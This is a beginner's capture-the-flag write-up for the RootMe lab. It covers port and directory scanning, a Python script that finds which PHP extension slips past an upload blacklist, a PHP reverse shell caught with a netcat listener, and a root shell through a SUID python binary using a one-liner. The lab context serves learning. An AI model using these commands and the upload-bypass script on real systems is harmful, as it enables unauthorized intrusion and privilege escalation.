
RootMe writeup [thm]

r00t me

RootMe: A CTF for beginners, can you root me?

This was a simple and not very exciting challenge but I solved it pretty quickly using techniques I didn't know about a month or two ago so I think I'm slowly making progress.

Recon

As per usual we start with an nmap scan against the target IP:

$: nmap -A -p- $target

We see that there is an Apache server running; its version number is also given in the output.

We can also open the target IP in a web browser and look around. There is nothing interesting there, but it's good practice.

Can we find any other directories served by the web server?

Run:

$: gobuster dir -u http://$target -w /usr/share/wordlists/dirb/common.txt

(Any reasonable directory wordlist will do; dirb's common.txt is enough here.) This finds two interesting directories: /panel, which is a file uploader, and /uploads, where the uploaded files end up. Upload a picture of a cute cat to verify that it works.

Does the uploader impose any restrictions on the files? An educated guess is that the web server is running PHP in the backend, so let's try to upload a PHP reverse shell as is. Indeed, this is not allowed.

Bypassing filtering and getting a shell

This was the only part of the challenge that wasn't completely obvious to me. Had I just followed the road map presented in earlier rooms, e.g. Upload Vulnerabilities, where you go from simple methods to successively more complex ones, I would have got this in no time. Instead I fucked up and wasted time by trying irrelevant stuff.

The server uses server-side file extension blacklisting. Under the assumption that we are dealing with a LAMP-ish server, we try to upload the PHP reverse shell under each of the filename extensions listed on the PHP Wikipedia page. This eventually shows that the admin was stoned while setting this up and forgot to add one extension to the blacklist. A blacklist is the wrong tool for this: any extension Apache's PHP handler matches that the admin did not think of will execute, whereas an allowlist of a few harmless extensions (plus serving /uploads without PHP execution) would have closed this.
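Trying the extensions by hand in the browser works, but it is tedious and easy to lose track of. The script below is an added example, not part of the original writeup: it uploads a harmless PHP probe under every extension from the list and then fetches each one back to see whether the server actually executed it (rather than just accepted it). It assumes, since the page does not say, that the form at /panel/ posts a multipart field named "fileToUpload" and that uploads land at /uploads/<name>; adjust FIELD and the URLs to match the real form. Only the standard library is used.

```python
"""Enumerate which PHP-style extensions an upload blacklist lets through.

Added example, not code from the original writeup. Assumptions (not stated
on the page): the upload form at /panel/ posts a multipart field named
"fileToUpload" and the file then becomes reachable at /uploads/<name>.
"""
import sys
import uuid
import urllib.error
import urllib.request

# Filename extensions listed for PHP on Wikipedia. A blacklist that forgets
# one of these is bypassed with that one.
PHP_EXTENSIONS = [
    "php", "phtml", "php3", "php4", "php5", "php7", "phps", "php-s", "pht", "phar",
]

FIELD = "fileToUpload"  # assumed form field name, check the real form
# Harmless probe: if PHP executes the file, the response body carries the marker.
MARKER = "ext-probe-ok"
PROBE = f"<?php echo '{MARKER}'; ?>\n"


def candidate_names(base, extensions=PHP_EXTENSIONS):
    """Return '<base>.<ext>' for every extension under test."""
    return [f"{base}.{ext}" for ext in extensions]


def build_multipart(field, filename, content, boundary):
    """Hand-build a multipart/form-data body (stdlib only, no requests)."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content.encode() + tail


def upload(panel_url, filename, content):
    """POST one file to the uploader; returns the HTTP status code."""
    boundary = "----probe" + uuid.uuid4().hex
    body = build_multipart(FIELD, filename, content, boundary)
    req = urllib.request.Request(panel_url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def executed(uploads_url, filename):
    """True only if fetching the file makes the server run it as PHP."""
    try:
        with urllib.request.urlopen(f"{uploads_url}/{filename}", timeout=10) as resp:
            return MARKER in resp.read().decode(errors="replace")
    except urllib.error.HTTPError:
        return False  # 403/404: rejected by the blacklist or not served


def main(target):
    panel = f"http://{target}/panel/"
    uploads = f"http://{target}/uploads"
    for name in candidate_names("probe"):
        try:
            upload(panel, name, PROBE)
        except urllib.error.URLError as err:
            print(f"{name}: upload request failed ({err})")
            continue
        # The upload form may answer 200 even when it refuses the file, so the
        # decisive check is whether the probe runs when fetched back.
        state = "EXECUTED" if executed(uploads, name) else "not executed"
        print(f"{name}: {state}")


if __name__ == "__main__":
    main(sys.argv[1])
```

Run it as `python3 probe_ext.py $target`; whichever name prints EXECUTED is the extension to rename the reverse shell to. Checking execution rather than the upload response matters because the uploader can accept a file that Apache then serves as plain text, which is useless to us.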

Once we manage to bypass the server-side filtering and upload our PHP reverse shell, start listening (the port must match the one set in the shell, and the IP in the shell must be our attacking machine's):

$: nc -lvp 1234

Then go to /uploads in a web browser and click on the uploaded shell.

The user flag is easy to find.

Privesc

Alright, we have a shell. Now we want to become root. We could upload and run LinEnum to look for privilege escalation paths, but since this is supposed to be an easy challenge it suffices to search with find for root-owned binaries with the SUID bit set:

$: find / -user root -perm -4000 -type f 2>/dev/null

A certain nice snake looks out of place in the output. Can we use it to become root?

Of course! GTFOBins to the rescue! In the Python SUID section we find that executing:

$: python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

drops us into a root shell. The -p flag tells the shell to keep the elevated effective UID instead of resetting it to our real UID, which is what it would do by default. Now:

$: whoami
root

we are done here.

Conclusion

Again overthinking simple stuff. This seems to be a theme with me and ctfs. I need to step back and think things through before starting the attack.

These challenges are a lot more fun when you can get away with avoiding Burp Suite and Metasploit.

I still feel like a (very old) script kiddie, but on the other hand, say that I forgot an SSH password to an important server and I know that it's possible to brute force the password; why would I create my own, probably inferior, tool for this rather than using Hydra? I'm not sure where the line is drawn. At least I try to understand what I'm doing, maybe that counts for something.

I'm still having a lot of fun solving these challenges and I'm slowly making some progress. When I started out I wouldn't have been able to solve this. The challenge in itself is not much to write home about but nevertheless it's good to see that I'm able to solve it without much trouble.